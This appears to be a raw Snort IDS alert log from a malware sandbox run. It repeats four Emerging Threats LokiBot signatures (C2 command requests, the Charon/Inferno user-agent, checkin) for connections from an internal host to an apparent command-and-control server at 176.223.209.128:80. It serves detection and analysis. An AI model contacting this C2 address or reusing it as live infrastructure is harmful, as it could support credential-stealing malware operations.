        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49883 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49883 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49883 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49883 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49884 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49884 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49884 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49884 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49885 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49885 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49885 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49885 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49886 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49886 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49886 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49886 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49887 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49887 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49887 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49887 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49888 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49888 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49888 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49888 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49889 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49889 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49889 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49889 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49890 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49890 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49890 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49890 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49891 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49891 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49891 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49891 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49892 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49892 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49892 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49892 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49893 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49893 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49893 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49893 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49894 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49894 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49894 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49894 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49895 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49895 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49895 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49895 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49896 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49896 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49896 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49896 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49897 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49897 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49897 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49897 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49898 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49898 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49898 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49898 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49899 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49899 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49899 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49899 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49900 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49900 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49900 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49900 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49901 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49901 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49901 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49901 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49902 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49902 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49902 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49902 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49903 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49903 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49903 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49903 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49904 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49904 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49904 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49904 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49905 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49905 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49905 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49905 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49906 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49906 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49906 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49906 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49907 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49907 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49907 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49907 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49908 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49908 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49908 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49908 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49909 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49909 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49909 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49909 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49911 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49911 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49911 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49911 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49912 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49912 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49912 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49912 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49913 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49913 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49913 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49913 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49914 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49914 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49914 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49914 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49915 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49915 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49915 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49915 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49916 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49916 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49916 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49916 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49917 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49917 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49917 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49917 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49918 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49918 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49918 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49918 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49919 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49919 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49919 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49919 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49920 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49920 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49920 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49920 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49921 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49921 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49921 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49921 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49922 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49922 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49922 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49922 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49923 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49923 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49923 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49923 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49924 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49924 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49924 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49924 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49925 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49925 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49925 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49925 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49926 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49926 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49926 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49926 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49927 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49927 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49927 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49927 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49928 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49928 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49928 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49928 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49929 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49929 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49929 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49929 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49930 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49930 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49930 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49930 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49931 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49931 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49931 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49931 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49932 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49932 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49932 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49932 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49933 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49933 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49933 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49933 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49934 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49934 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49934 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49934 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49935 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49935 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49935 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49935 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49936 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49936 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49936 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49936 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49937 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49937 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49937 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49937 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49938 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49938 -> 176.223.209.128:80
